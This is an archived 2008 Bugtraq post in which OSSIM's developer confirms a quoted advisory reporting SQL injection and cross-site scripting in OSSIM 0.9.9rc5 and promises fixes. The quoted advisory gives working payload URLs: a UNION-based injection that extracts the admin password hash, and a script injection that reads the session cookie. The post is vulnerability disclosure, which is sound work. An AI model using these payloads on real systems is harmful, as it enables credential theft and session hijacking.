lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-Id: <CCF03CDE-D1BF-4D27-AFF2-A9E78A54F311@ossim.net>
Date: Fri, 22 Feb 2008 08:50:52 +0100
From: Dominique Karg <dk@...im.net>
To: marcin.kopec@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)

Hello,

I can confirm this affecting earlier versions as well, the XSS has  
been fixed some months ago, the SQL Injection (and others) were caused  
by a failure in the "punctuation" validation regexp. Just fixed that  
one as well as some others.

We're going to release a fixed version asap after stopping development  
in order to get a throughout security audit done. The SQL regexp I  
just fixed and we'll update the packages today.

Nonetheless, exposure should be minimal since:

a) You aren't going to provide public access to your SIM console,  
aren't you ?
b) Regarding the specific SQL injection mentioned in here (as said,  
there are more we're going to fix), you shouldn't give access to the  
policy section to normal users either.

I must thank you for pointing this out but would've appreciate a more  
"direct" contact, as it is considered a polite way of releasing bugs.

Greetings,

Dominique

Am 21.02.2008 um 13:47 schrieb marcin.kopec@...mail.com:

> Application: OSSIM
> http://www.ossim.net
> Version: 0.9.9rc5
> Note: it is possible that the problem affects also earlier OSSIM  
> versions
> Platforms: Linux
> Bug: SQL injection, Cross Site Scripting
> Exploitation: remote
> Date: 21 Feb 2008
> Author: Marcin Kopec
> E-mail: marcin(dot)kopec(at)hotmail(dot)com
>
> ---------------------------------------
>
> 1) Introduction
>
> OSSIM it's a free implementation of  Security Information Management  
> (SIM) system, equipped with many useful security tools (nessus,  
> snort, p0f, ntop, ...) managed from easy-to-use web panel.
>
> 2) SQL injection
>
> The bug exist in portname parameter of modifyportform.php
> It's possible to obtain hashed administrator password when user have  
> rights to do port modification in "PORTS" tab.
>
> http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and 
> %201=2%20union%20select%20pass,2%20from%20ossim.users%20where 
> %20login='admin
>
> 3) XSS
>
> Quotes in OSSIM aren't property sanitized.
> Below XSS may be executed without logging into the OSSIM.
>
> http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript 
> %3Ealert(document.cookie)%3C/script%3E%3C!--

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ